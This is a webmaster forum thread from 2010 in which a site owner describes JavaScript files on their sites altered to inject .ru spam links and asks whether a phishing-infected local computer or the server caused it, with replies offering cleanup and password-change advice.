|Site files compromised, need advice|
some .js files were edited to print .ru urls in my sites
I noticed that 2-3 sites on one of my sites were compromised, a .ru url appeared in the footer of the site.
I was able to fix it by sorting my remote files by date modified and replace them with the copy from my local computer.
The only thing I noticed changed were some common/known .js files like swfobject.js it had a document.write in it to print the malware links in my pages.
My question is: what causes these things in general? Is it more likely that my local computer had a virus/worm that modified my files (maybe through adobe Dreamweaver)? Or is it more likely that server was compromised directly ?
In the same day as file modified date (3 August) I got an email that appeared to be from Vimeo, I clicked the link in it, after that I seen browser errors that said some exe was not found, computer acted suspiciously so I had to do a system restore.
Do you think I should be safe now? Avast didn't find anything locally but it also didn't warn me about that email or virus or what that was.
Ok, I just checked, another site on different server has same malware, so this means it was made thrugh my computer, right? Server was not targeted directly?! Any advices?
Some ideas on this one...
1 - Curse the hacker
2 - Remove all files, start changing all passwords.
3 - Check permissions on files and folders
4 - Reload site from last backup.
5 - Check for information specific to your hack type.
6 - Contact host, tell them what happened
7 - Cross fingers
8 - Say a prayer
9 - Monitor site very closely for a week
Best of luck, been there, hate it.
Was it similar to this [webmasterworld.com]? Do you run WordPress?
Another theory is the end user inadvertently visits a malicious site, and it installs a malware that somehow monitors the user's FTP. Webmaster logs in to a site, and it sends the modified files along with it. It could be either an outright theft of the FTP login or piggy backing on the current connection, don't know. So it's entirely possible you are the source, but not definite.
I've been successful cleansing them with deep searches in all files, eliminating the code, then before uploading, change all passwords - Domain manager control panel, FTP accounts, WordPRess logins, CMS logins, everything. Doesn't seem to come back after that, which may lend credibility to #2.
It appears to be the same malware with that link and an unique identifier after it. But I don't have wordpress on affected sites.
I will continue conversation on that thread (above), it seems to have more details and it might help other users.
Similar here [webmasterworld.com...] but iframe tag instead of script tag.
[edited by: phranque at 6:26 am (utc) on Aug 6, 2010]
[edit reason] fix link [/edit]